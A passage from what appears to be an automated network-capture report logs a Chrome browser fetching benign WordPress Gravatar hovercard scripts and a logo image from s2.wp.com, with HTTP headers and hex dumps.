                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 72 65 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 70 28 61 2c 74 29 7d 29 29 2c 74 2e 72 65 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 6d 28 61 2c 74 29 7d 29 29 7d 29 29 29 7d 2c 74 68 69 73 2e 64 65 74 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 69 2e 6c 65 6e 67 74 68 26 26 28 72 2e 69 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 3d 74 2e 72 65 66 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73
                                                                                                                                                                                                                                                                  Data Ascii: ((function(t){t.ref.addEventListener("mouseenter",(function(a){return r.p(a,t)})),t.ref.addEventListener("mouseleave",(function(a){return r.m(a,t)}))})))},this.detach=function(){r.i.length&&(r.i.forEach((function(t){var a=t.ref;a.removeEventListener("mous
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 2c 72 65 66 3a 6e 2e 43 28 74 29 7c 7c 74 7d 7d 29 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 2c 74 68 69 73 2e 69 7d 2c 72 2e 46 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 6e 3d 72 2e 69 64 2c 69 3d 72 2e 68 61 73 68 2c 65 3d 72 2e 70 61 72 61 6d 73 2c 76 3d 72 2e 72 65 66 2c 6c 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 6e 29 29 7b 76 61 72 20 72 3b 69 66 28 61 2e 75 2e 68 61 73 28 69 29 29 7b 76 61 72 20 6c 3d 61 2e 75 2e 67 65 74 28 69 29 3b 72 3d 74 2e 63 72 65 61 74 65 48 6f 76 65 72 63 61 72 64 28 73 28 7b 7d 2c 6c 2c 7b 61 76 61 74 61 72 55 72 6c 3a 6c 2e 61 76 61 74 61 72 55 72 6c 2b 65 7d 29 2c 7b 61 64 64 69 74 69 6f
                                                                                                                                                                                                                                                                  Data Ascii: ,ref:n.C(t)||t}})).filter(Boolean),this.i},r.F=function(r){var a=this,n=r.id,i=r.hash,e=r.params,v=r.ref,l=setTimeout((function(){if(!d.getElementById(n)){var r;if(a.u.has(i)){var l=a.u.get(i);r=t.createHovercard(s({},l,{avatarUrl:l.avatarUrl+e}),{additio
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 3b 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 65 72 72 6f 72 22 29 2c 72 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 2d 2d 73 6b 65 6c 65 74 6f 6e 22 29 2c 72 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 28 76 29 2c 61 2e 42 28 69 2c 7b 63 6f 64 65 3a 6e 2c 6d 65 73 73 61 67 65 3a 6f 7d 29 7d 29 29 3b 72 2e 69 64 3d 6e 2c 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 61 2e 6c 2e 67 65 74 28 6e 29 29 7d 29 29 2c 72 2e 61 64 64 45 76
                                                                                                                                                                                                                                                                  Data Ascii: stElementChild;r.classList.add("gravatar-hovercard--error"),r.classList.remove("gravatar-hovercard--skeleton"),r.replaceChildren(v),a.B(i,{code:n,message:o})}));r.id=n,r.addEventListener("mouseenter",(function(){return clearInterval(a.l.get(n))})),r.addEv
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 74 29 3b 61 26 26 28 61 2e 72 65 6d 6f 76 65 28 29 2c 72 2e 52 28 74 2c 61 29 29 7d 29 2c 74 68 69 73 2e 48 29 3b 74 68 69 73 2e 6c 2e 73 65 74 28 74 2c 61 29 7d 2c 72 2e 70 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 69 6e 20 64 7c 7c 28 74 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 6c 2e 67 65 74 28 72 2e 69 64 29 29 2c 74 68 69 73 2e 46 28 72 29 29 7d 2c 72 2e 6d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 61 3d 72 2e 69
                                                                                                                                                                                                                                                                  Data Ascii: ){var r=this,a=setTimeout((function(){var a=d.getElementById(t);a&&(a.remove(),r.R(t,a))}),this.H);this.l.set(t,a)},r.p=function(t,r){"ontouchstart"in d||(t.stopImmediatePropagation(),clearInterval(this.l.get(r.id)),this.F(r))},r.m=function(t,r){var a=r.i
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 61 76 61 74 61 72 22 20 73 72 63 3d 22 27 2b 76 28 75 29 2b 27 22 20 77 69 64 74 68 3d 22 37 32 22 20 68 65 69 67 68 74 3d 22 37 32 22 20 61 6c 74 3d 22 27 2b 6a 2b 27 22 20 2f 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 3c 2f 61 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 3c 61 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 70 65 72 73 6f 6e 61 6c 2d 69 6e 66 6f 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 27 2b 6b 2b 27 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 68 34 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 6e 61 6d 65 22 3e 27 2b 6a 2b 22 3c 2f 68 34 3e
                                                                                                                                                                                                                                                                  Data Ascii: class="gravatar-hovercard__avatar" src="'+v(u)+'" width="72" height="72" alt="'+j+'" />\n\t\t\t\t\t</a>\n\t\t\t\t\t<a class="gravatar-hovercard__personal-info-link" href="'+k+'" target="_blank">\n\t\t\t\t\t\t<h4 class="gravatar-hovercard__name">'+j+"</h4>
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 6f 66 69 6c 65 22 3a 22 56 69 65 77 20 70 72 6f 66 69 6c 65 22 29 2b 27 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 2f 73 70 61 6e 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 73 76 67 20 77 69 64 74 68 3d 22 31 36 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 5c 74 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 36 36 36 37 20 38 2e 33 33 33 33 38 4c 39 2e 31 36 36 36 36 20 31 32 2e 31 36 36 37 4d 31 32 2e 36 36 36 37 20 38 2e 33 33 33 33 38 4c 32 2e 36 36 36 36 36 20 38 2e 33 33 33 33 38 4d 31 32 2e 36 36 36 37 20 38 2e 33 33 33 33 38 4c 39 2e 31 36 36 36 36
                                                                                                                                                                                                                                                                  Data Ascii: ofile":"View profile")+'\n\t\t\t\t\t\t</span>\n\t\t\t\t\t\t<svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">\n\t\t\t\t\t\t\t<path d="M12.6667 8.33338L9.16666 12.1667M12.6667 8.33338L2.66666 8.33338M12.6667 8.33338L9.16666
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 74 2b 27 22 20 77 69 64 74 68 3d 22 37 32 22 20 68 65 69 67 68 74 3d 22 37 32 22 20 61 6c 74 3d 22 27 2b 6f 2b 27 22 20 2f 3e 5c 6e 5c 74 5c 74 5c 74 5c 74 3c 69 20 63 6c 61 73 73 3d 22 67 72 61 76 61 74 61 72 2d 68 6f 76 65 72 63 61 72 64 5f 5f 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 3e 27 2b 72 2b 22 3c 2f 69 3e 5c 6e 5c 74 5c 74 5c 74 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 5c 74 22 2c 76 7d 3b 76 61 72 20 75 2c 68 3d 69 2e 53 2c 66 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 45 6c 22 3a 7b 22 68 22 3a 22 5e 30 2e 39 2e 31 22 7d 7d 27 29 3b 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61
                                                                                                                                                                                                                                                                  Data Ascii: t+'" width="72" height="72" alt="'+o+'" />\n\t\t\t\t<i class="gravatar-hovercard__error-message">'+r+"</i>\n\t\t\t</div>\n \t",v};var u,h=i.S,f=JSON.parse('{"El":{"h":"^0.9.1"}}');function g(t,r){var a=Object.keys(t);if(Object.getOwnPropertySymbols){va
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 66 28 6e 65 77 20 68 28 5f 28 5f 28 7b 7d 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 7d 29 2c 7b 7d 2c 7b 6d 79 48 61 73 68 3a 74 68 69 73 2e 6d 79 5f 68 61 73 68 2c 61 64 64 69 74 69 6f 6e 61 6c 43 6c 61 73 73 3a 22 77 70 2d 68 6f 76 65 72 63 61 72 64 22 2c 6f 6e 51 75 65 72 79 48 6f 76 65 72 63 61 72 64 52 65 66 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 20 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 70 2d 68 6f 76 65 72 63 61 72 64 2d 61 74 74 61 63 68 6d 65 6e 74 22 29 2c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 67 72 61 76 2d 68 61 73 68 65 64 22 29 2c 22 41 22 21 3d 3d 28
                                                                                                                                                                                                                                                                  Data Ascii: f(new h(_(_({},arguments.length>2&&void 0!==arguments[2]?arguments[2]:{}),{},{myHash:this.my_hash,additionalClass:"wp-hovercard",onQueryHovercardRef:function(t){var r;return t.classList.add("wp-hovercard-attachment"),t.classList.add("grav-hashed"),"A"!==(


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  17192.168.2.1649725192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC399OUTGET /wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s2.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 655
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/1125-1684460931415.6394
                                                                                                                                                                                                                                                                  Expires: Fri, 30 May 2025 20:25:07 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw BYPASS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC655INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 57 50 47 72 6f 48 6f 7c 7c 7b 7d 3b 65 2e 6d 79 5f 68 61 73 68 3d 22 22 3b 65 2e 64 61 74 61 3d 7b 7d 3b 65 2e 72 65 6e 64 65 72 65 72 73 3d 7b 7d 3b 65 2e 73 79 6e 63 50 72 6f 66 69 6c 65 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 72 29 7b 69 66 28 21 65 2e 64 61 74 61 5b 61 5d 29 7b 65 2e 64 61 74 61 5b 61 5d 3d 7b 7d 3b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 64 69 76 2e 67 72 6f 66 69 6c 65 2d 68 61 73 68 2d 6d 61 70 2d 22 2b 61 2b 22 20 73 70 61 6e 22 29 3b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 6e 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 5b 74 5d 3b 65 2e 64 61 74 61 5b 61 5d 5b 6f 2e 63 6c
                                                                                                                                                                                                                                                                  Data Ascii: (function(){var e=window.WPGroHo||{};e.my_hash="";e.data={};e.renderers={};e.syncProfileData=function(a,r){if(!e.data[a]){e.data[a]={};var n=document.querySelectorAll("div.grofile-hash-map-"+a+" span");for(var t=0;t<n.length;t++){var o=n[t];e.data[a][o.cl


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  18192.168.2.1649726192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC360OUTGET /i/logo/wpcom-gray-white.png HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s2.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                  Content-Length: 8203
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 19 May 2023 02:58:44 GMT
                                                                                                                                                                                                                                                                  ETag: "6466e5e4-200b"
                                                                                                                                                                                                                                                                  Expires: Fri, 24 Jan 2025 04:41:09 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC901INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 03 00 00 00 fc 08 2f b8 00 00 00 72 50 4c 54 45 de de de dd dd dd dc dc dc df df df e1 e1 e1 e3 e3 e3 e7 e7 e7 e8 e8 e8 ea ea ea ee ee ee ef ef ef eb eb eb e4 e4 e4 e2 e2 e2 e6 e6 e6 f1 f1 f1 f4 f4 f4 f6 f6 f6 fa fa fa fb fb fb fd fd fd ff ff ff fe fe fe f7 f7 f7 f5 f5 f5 e0 e0 e0 ec ec ec f2 f2 f2 ed ed ed e9 e9 e9 f8 f8 f8 fc fc fc f9 f9 f9 f3 f3 f3 f0 f0 f0 e5 e5 e5 db db db da da da 72 1c ce 58 00 00 1f 54 49 44 41 54 78 da ec da d9 96 aa 48 10 05 d0 8c 20 11 29 44 64 88 04 65 54 ff ff 1f ef bd 56 f7 ea 55 dd 2d 24 8e 08 67 3f eb 83 eb 18 91 53 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR/rPLTErXTIDATxH )DdeTVU-$g?S(
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 14 fb ff e2 73 27 16 b2 d3 84 26 d2 88 75 d5 da 6d e3 91 fa 7f 11 59 9d cd db 4a 33 4d 6c 1b b2 4e c4 42 e4 a0 c5 ff 0b eb d8 2a f2 29 de 76 b0 b2 8a bd db a0 d8 7f e0 55 6a 1f f9 a7 c6 9e 05 a8 f5 7f 10 f9 32 28 f3 1d 56 93 c5 2a 48 65 50 89 16 ff 37 da 17 32 e8 a4 79 ea 37 89 16 4f c1 1d ee e7 be f1 26 b1 19 4a a0 4f 18 fa 90 21 99 87 d4 7f e3 da c8 80 6e c5 a4 3e 00 d9 bc 08 fb 78 6f 25 fa 92 01 ed 41 d1 9c 66 3f 76 4b 5f d8 c9 d9 c9 80 52 f3 67 3d 12 fa 46 fa 35 cb 5e d8 39 6c a4 5f f7 79 d3 27 1c 16 d2 2f 3d f3 92 2f 5e 53 e9 65 2a 45 9f b8 64 d5 43 bf ab e6 c5 66 ee 19 e9 15 bb fc a9 2f c4 a5 f4 3b d0 42 33 0f 06 2f b0 e8 83 ff d0 a9 f4 3a f1 12 63 1f da b6 c7 21 ab 8b 99 16 fb 51 d1 f2 32 8f 06 56 73 22 f5 d9 86 06 bf 8a a5 1d dd 48 ed e6 ff 22 c5
                                                                                                                                                                                                                                                                  Data Ascii: s'&umYJ3MlNB*)vUj2(V*HeP72y7O&JO!n>xo%Af?vK_Rg=F5^9l_y'/=/^Se*EdCf/;B3/:c!Q2Vs"H"
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: bf b5 71 d0 d1 d4 49 ff 7d 7d ec df 10 5b 47 af d5 44 4c 77 9b 72 cd 98 78 bc 26 8a d4 1a 15 32 7b a5 0c 3c e2 72 cb 6c eb 7a d5 5b 67 5b f7 70 e5 2a 2f 79 a5 1e c9 19 9e b2 6d 95 49 ad 71 ba 77 fd 75 cd e5 d3 87 43 fd 6a a7 d1 9b c2 ae 5a 22 e2 8a 85 ef f0 56 11 2f f8 27 f8 f8 65 b0 d1 ea 14 6d 57 4d e3 0d 26 6a 70 22 2f 24 7c 38 2f bd 91 b0 50 b5 52 96 f1 fd c1 c3 77 78 fd aa fe 9c 8f ef bb 6f 9c 4e cc 0c 62 1b a1 e9 79 ba cd a9 5d f9 ca 0f 0c cd 14 dc 8b 74 13 f0 de 53 0d c1 e7 c0 1f 48 50 b4 5b d4 c6 e3 bd 7c e5 f4 45 01 0f df 05 9d d6 18 7d ee a5 49 f0 12 0b 1c 4a e6 fa 82 cc b9 aa 5a dd aa a5 aa 74 60 5f c4 6a fe 2b 4f 25 33 df 8f 0c 7c 5f 59 61 bd d0 1c 37 7b 0f 2f d0 03 5b e3 ca cb 77 9c 99 f8 2e 68 5c 63 74 41 a9 ed bb 87 ce df e4 7f 22 ee fa 71
                                                                                                                                                                                                                                                                  Data Ascii: qI}}[GDLwrx&2{<rlz[g[p*/ymIqwuCjZ"V/'emWM&jp"/$|8/PRwxoNby]tSHP[|E}IJZt`_j+O%3|_Ya7{/[w.h\ctA"q
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: de b2 f1 9d 52 0d df 5d b3 a2 1e 58 64 f4 90 34 18 c7 cb 77 bf e2 e2 3b dd 8c 9a 6e e1 5b 64 f4 c4 28 27 8c 90 99 ef c8 b8 76 3d a2 48 83 ee 9a 46 bf 91 3d cd 52 13 34 a2 55 66 be 47 2c 55 fd e5 d2 72 fb 6c 71 b2 b5 c8 e8 3e f4 67 36 73 be 73 1c 6f 3e 7e a5 d1 2b 1f 3a c3 84 df e8 f4 30 33 3a 26 06 be 1b 7a 15 e6 9b 3a 69 18 5d 3b ab 2a 7b 6b 2a 2e d4 9a 86 8f 03 73 7d 35 61 e0 fb b2 d1 23 7a 36 21 32 da 63 f4 42 6a 7d 91 39 ff fe 50 3c 7c a7 93 19 45 50 5b 6d f4 5e ea c5 7a ac 7c a7 8b e2 e1 3b 45 b3 f1 a0 db 46 37 0f 9a 2e 5c e7 f3 e9 f3 dd b4 da 34 c1 7d a3 53 c4 c9 f7 77 ba f3 f0 9d d2 d9 33 82 1c 37 ba 79 2a f6 46 9b b5 01 30 f0 7d 21 f7 de 92 eb 46 37 0f 9a 32 6c 16 a6 f3 f0 1d d7 85 e6 38 f7 8d 1e 28 03 55 31 36 a2 3b 13 df 91 cd bf cc ee 1b 5d c8
                                                                                                                                                                                                                                                                  Data Ascii: R]Xd4w;n[d('v=HF=R4UfG,Urlq>g6sso>~+:03:&z:i];*{k*.s}5a#z6!2cBj}9P<|EP[m^z|;EF7.\4}Sw37y*F0}!F72l8(U16;]
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 00 a0 18 79 51 87 39 b4 3f 69 6a 88 76 df 18 68 8b 41 f9 ae ce 95 db 5c 6b b0 76 46 c8 d4 41 d2 c6 93 a6 4e 6f 93 e8 bc d0 80 8f 17 f9 33 03 0d b5 a5 40 c2 36 51 96 8e 8c 42 7e 7c da d6 88 ef 6f 6b f7 4c 40 55 70 7f a6 f2 2c c9 76 07 f9 70 84 6b d4 c9 b1 1b 9e 34 e5 ef 2f 1b 1b 03 1d 8a 29 df b5 f4 95 88 e7 11 8c 77 b0 5d 0c 7e 9a 27 69 ea f4 26 dd eb 85 80 aa a0 fa dd b6 00 0e 2f 82 00 ac 0e a3 87 9e 41 20 a4 8e f3 7d 38 dd 9f 36 1c a6 7e fd ae d2 b3 f0 59 0b 36 17 23 34 a4 60 7c e7 56 6c 3e 80 ee 43 6b d3 b4 46 7c 1f f0 df 29 02 1b 24 63 62 6c af 72 be a7 98 ef c3 e9 7e 0d dc a1 b8 1a 20 4e 29 dd f7 c0 90 9a 2c 54 52 df c8 5f bf d2 1a a0 7b 48 55 b1 d3 5b ea 3b 03 da 3d 42 2b 31 ea a6 2d 35 85 15 9b 03 ba 07 55 15 a9 bd 95 90 3c ec ed 74 06 54 bc 47 30
                                                                                                                                                                                                                                                                  Data Ascii: yQ9?ijvhA\kvFANo3@6QB~|okL@Up,vpk4/)w]~'i&/A }86~Y6#4`|Vl>CkF|)$cblr~ N),TR_{HU[;=B+1-5U<tTG0
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC1369INData Raw: 26 df 41 7d cc 9b 8d 58 bf 52 42 42 fa 6b b1 a1 86 b1 35 68 7a 3b e3 e8 9b 27 7b 0b 9f 34 01 29 04 54 05 79 00 b2 51 11 1f ee fc 95 f5 4c d4 d3 42 c1 ad d8 71 72 1e 7b 8e fc 00 4a aa ff 17 dc 39 1d 8b 0f 8d 92 34 f1 95 c4 af 2a d8 66 b8 9e 11 e0 1e 47 c1 7f df 45 92 26 7e 57 de 04 56 2c 2a 12 b3 f4 1b c0 7d ee 80 3f 51 7d c3 eb 57 38 dd c3 ab 8a 52 0c 24 97 39 b5 9d e0 78 a4 45 c1 45 04 ba 03 2b 16 d1 5d bb 33 98 13 d1 83 cf 94 cb ce c2 d6 af 80 d6 85 a3 ab 8a 7a 21 c0 c1 d9 7b ee fc a5 9d be 14 2e 69 a2 36 50 f8 b6 18 c3 4b 9f 75 ad c0 b7 32 9b 60 08 ab ae 0a 5c bf c2 37 26 f9 65 71 fc 01 94 d1 a5 2f 7e 70 57 eb 28 01 55 80 e9 ce ad 58 1a f5 55 c0 02 98 75 b6 e6 af 70 cc c6 4d 9a 32 0b e4 26 73 ba 93 23 9a c5 c7 9c c3 df 22 ec 60 40 0a 62 b8 72 5f 11 c6
                                                                                                                                                                                                                                                                  Data Ascii: &A}XRBBk5hz;'{4)TyQLBqr{J94*fGE&~WV,*}?Q}W8R$9xEE+]3z!{.i6PKu2`\7&eq/~pW(UXUupM2&s#"`@br_
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC457INData Raw: 66 52 51 5c 27 65 2f 4e 0a 6c d3 1e c5 ba ce c5 59 5e 5e c2 76 8a 2a f5 19 3e d1 6f a3 26 62 66 a5 bd d3 ae 4e ce 99 11 57 c5 01 f7 6f 4f 89 bd e9 e5 21 26 1f d2 4b 73 0c 76 be ef 69 ad e9 0b a5 75 e5 fb 71 b0 6f 92 b1 cb 3f 2f df 88 fc fb 71 55 e7 f2 0c c6 f4 79 9e 9d bf 18 f2 bc 37 46 3e 21 f2 77 29 f2 b7 21 f2 57 8d bd 1d e4 85 e5 35 1e a6 2d 80 d5 ee 2c 2f aa db e3 8e 7d 21 44 a7 a4 90 97 63 d2 98 10 f9 72 88 bd ba 93 97 92 85 11 9e 98 2f 8c 98 e2 4b 21 2f c2 a4 3b 85 c8 d7 5a ee a5 bc 80 21 8c 18 75 7d 35 4c d3 21 93 6f d5 27 31 16 f9 ca 88 75 9c 64 df 96 f8 18 54 48 fc db 72 cf 91 f8 16 73 3f 74 46 d6 93 25 bb 0a 17 f2 ef 46 4c fe 31 cd 65 05 fd b9 39 e1 3a fe 3a b9 57 f1 a1 2c 64 41 a6 bb 06 1e 21 f1 97 42 ac bc 5d 78 5e 24 f8 a2 bb b6 11 96 f8 eb
                                                                                                                                                                                                                                                                  Data Ascii: fRQ\'e/NlY^^v*>o&bfNWoO!&Ksviuqo?/qUy7F>!w)!W5-,/}!Dcr/K!/;Z!u}5L!o'1udTHrs?tF%FL1e9::W,dA!B]x^$


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  19192.168.2.1649731192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
